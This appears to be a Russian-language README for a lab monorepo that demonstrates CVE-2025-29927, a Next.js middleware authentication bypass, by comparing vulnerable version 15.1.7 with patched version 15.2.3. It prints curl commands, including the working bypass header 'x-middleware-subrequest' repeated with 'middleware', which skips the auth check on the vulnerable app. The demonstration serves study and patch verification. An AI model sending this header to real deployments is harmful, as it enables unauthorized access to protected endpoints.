
vulnerable-nextjs-14-CVE-2025-29927
Этот репозиторий — монорепозиторий, позволяющий сравнить уязвимость CVE-2025-29927 мидлваре в версиях Next.js 15.2.3 и 15.1.7.
CVE-2025-29927 — это уязвимость безопасности, обнаруженная в мидлваре Next.js, которая позволяет обойти мидлваре аутентификации с помощью заголовка x-middleware-subrequest.
Уязвимость затрагивает следующие версии:
Эти версии были исправлены путём обновления до соответствующих патч-версий.
pnpm installpnpm dev$ curl http://localhost:3000/api/protected
// {"error":"Unauthorized"}
$ curl http://localhost:3001/api/protected
// {"error":"Unauthorized"}
$ curl -H "Authorization: my-jwt-token-here" http://localhost:3000/api/protected
// {"message":"Hello World"}
$ curl -H "Authorization: my-jwt-token-here" http://localhost:3001/api/protected
// {"message":"Hello World"}
curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://localhost:3000/api/protected
// {"error":"Unauthorized"}
curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://localhost:3001/api/protected
// {"message":"Hello World"}
nextjs-cve-2025-29927/
├── apps/
│ ├── next15_1_7/ # уязвимая версия
│ └── next15_2_3/ # исправленная версия
├── packages/
│ └── ui/ # общие UI-компоненты
└── README.md